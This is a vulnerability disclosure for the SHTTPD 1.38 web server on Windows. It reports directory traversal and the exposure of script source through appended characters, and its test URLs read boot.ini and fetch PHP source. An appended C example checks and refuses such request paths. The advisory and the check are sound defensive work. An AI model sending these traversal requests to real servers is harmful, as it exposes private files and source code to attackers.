Hey,
I was testing SHTTPD and found some problems I want to report.
Note that I tested only the 1.38 version on Windows, so some of the bugs
or some exploitation methods might not work on other platforms.
The following are the details of the problems:
----------------------
A] directory traversal
----------------------
Using the "..\" pattern it is possible to download any file on the disk on
which the web root directory is located.
--------------------------------------
B] scripts and CGI viewing/downloading
--------------------------------------
Any script or CGI on the server can be viewed/downloaded instead of
being executed simply by adding the chars '+', '.', %20 (this one reported
by Shay Priel in the summer of 2007), %2e and any other byte (in hex
format too) greater than 0x7f to the requested filename.
---
For testing them:
A]
http://SERVER/..\..\..\boot.ini
http://SERVER/..\%2e%2e%5c..\boot.ini
B]
http://SERVER/file.php+
http://SERVER/file.php.
http://SERVER/file.php%20
http://SERVER/file.php%80
BYEZ
---
Luigi Auriemma
http://aluigi.org
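
A request-path check covering both issue A and issue B above, as an added example that is not part of the original post and is not SHTTPD's own code. The function names, the 1024-byte buffer and the policy of refusing such requests instead of normalizing them are assumptions.

```c
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Percent-decode src into dst exactly once. Returns -1 on a malformed escape,
 * overflow, or a decoded byte outside printable ASCII (%00, bytes > 0x7f). */
static int decode_printable(const char *src, char *dst, size_t n)
{
    const unsigned char *s = (const unsigned char *)src;
    size_t o = 0;
    for (; *s; s++) {
        unsigned char c = *s;
        if (c == '%') {
            if (!isxdigit(s[1]) || !isxdigit(s[2])) return -1;
            char hex[3] = { (char)s[1], (char)s[2], '\0' };
            c = (unsigned char)strtol(hex, NULL, 16);
            s += 2;
        }
        if (c < 0x20 || c > 0x7e || o + 1 >= n) return -1;
        dst[o++] = (char)c;
    }
    dst[o] = '\0';
    return 0;
}

/* Hypothetical helper: 1 if the request path may be mapped to a file, else 0. */
int request_path_is_safe(const char *raw)
{
    char path[1024];
    if (decode_printable(raw, path, sizeof path) != 0) return 0;
    /* Per segment ('/' and '\' both separate): no "..", no trailing '.', ' ', '+'. */
    for (const char *seg = path;; ) {
        size_t len = strcspn(seg, "/\\");
        if (len == 2 && seg[0] == '.' && seg[1] == '.') return 0;
        if (len > 0 && strchr(". +", seg[len - 1])) return 0;
        if (seg[len] == '\0') return 1;
        seg += len + 1;
    }
}

int main(void)
{
    /* Sample requests built from the test URLs in the post. */
    const char *samples[] = { "/..\\%2e%2e%5c..\\boot.ini", "/file.php%80", "/file.php" };
    for (size_t i = 0; i < 3; i++)
        printf("%-26s %s\n", samples[i], request_path_is_safe(samples[i]) ? "serve" : "refuse");
    return 0;
}
```

A server using a check like this should open the file from the same decoded string it validated, so that no later decoding step can reintroduce the patterns.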